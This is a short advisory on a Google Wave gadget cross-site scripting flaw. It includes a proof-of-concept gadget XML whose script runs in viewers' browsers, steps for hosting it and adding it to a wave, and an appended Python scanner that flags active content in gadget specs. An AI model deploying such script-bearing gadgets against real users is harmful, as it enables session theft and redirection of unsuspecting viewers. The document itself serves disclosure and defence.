Author: Shadowhider
Description:
Google Wave is a network communication service provided by Google. It combines email and instant messaging to make communication easier. Wave Gadget is one of the two extensions of Google Wave. A gadget is a fully functional application.
A Wave Gadget can reference an XML file on an external domain to implement the functions required by users. However, Wave Gadget places no security restriction on the content of the referenced XML file, so an attacker can execute arbitrary code through the XML file, and malicious users can exploit this.
POC:
Create an XML file and write the following code:

    <?xml version="1.0" encoding="UTF-8"?>
    <Module>
      <ModulePrefs title="Hello Wave">
        <Require feature="wave"/>
      </ModulePrefs>
      <!-- HTML body of the gadget; the script inside it runs in the viewer's browser -->
      <Content type="html">
        <![CDATA[
        <script type="text/javascript">
          window.open("http://www.x3y3.org/");
          alert("Just 4 Fun ~ By ShadowHider");
        </script>
        ]]>
      </Content>
    </Module>

Then upload the XML file to any web space, such as http://www.x3y3.org/s.xml
Log in to Wave, select New Wave, and then select Add Gadget By URL to enter the address of the XML file.
Then the browser of a user viewing the wave will execute the code in the remote XML file.
Suggestion:
We have some suggestions and look forward to the official version of Google Wave.
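
One way to express the missing restriction, as an added example that is not from the original advisory or from Google: a Python check that a gadget host could run on a fetched spec before accepting it through Add Gadget By URL. The function name, the finding labels, the policy sets and the sample spec are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Assumed policy for this example, not Google's: what counts as active content.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action"}

class ActiveContentScanner(HTMLParser):
    """Collects (kind, detail) findings from a gadget's HTML body."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-tag", tag))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", name))
            elif name in URL_ATTRS and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(("javascript-url", name))

def audit_gadget_spec(xml_text):
    """Return findings for every HTML <Content> section of a gadget spec."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("malformed-xml", str(exc))]  # refuse specs that do not parse
    findings = []
    for content in root.iter("Content"):
        # Assumption: a missing type attribute is treated like type="html".
        if content.get("type", "html").lower() != "html":
            continue
        scanner = ActiveContentScanner()
        scanner.feed(content.text or "")
        scanner.close()
        findings.extend(scanner.findings)
    return findings

# Constructed sample with the PoC's structure; the script body is a placeholder.
SAMPLE_SPEC = """<?xml version="1.0" encoding="UTF-8"?>
<Module>
  <ModulePrefs title="Hello Wave"><Require feature="wave"/></ModulePrefs>
  <Content type="html"><![CDATA[
    <script type="text/javascript">/* gadget code */</script>
    <a href="JavaScript:void(0)" onclick="return false">x</a>
  ]]></Content>
</Module>"""

if __name__ == "__main__":
    print(audit_gadget_spec(SAMPLE_SPEC))
```

A non-empty result means the spec carries code that would run in the browser of anyone viewing the wave, so the host can refuse the URL or render the gadget in an isolated origin.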
Refer:
http://code.google.com/intl/zh-CN/apis/wave/guide.html
The related discussions are as follows: http://xeyeteam.appspot.com/2009/12/6/Google-Wave-XSS.html
PS: After Shadow is sent, it will flash. Wave designers do not consider the security of remote loading of XML files.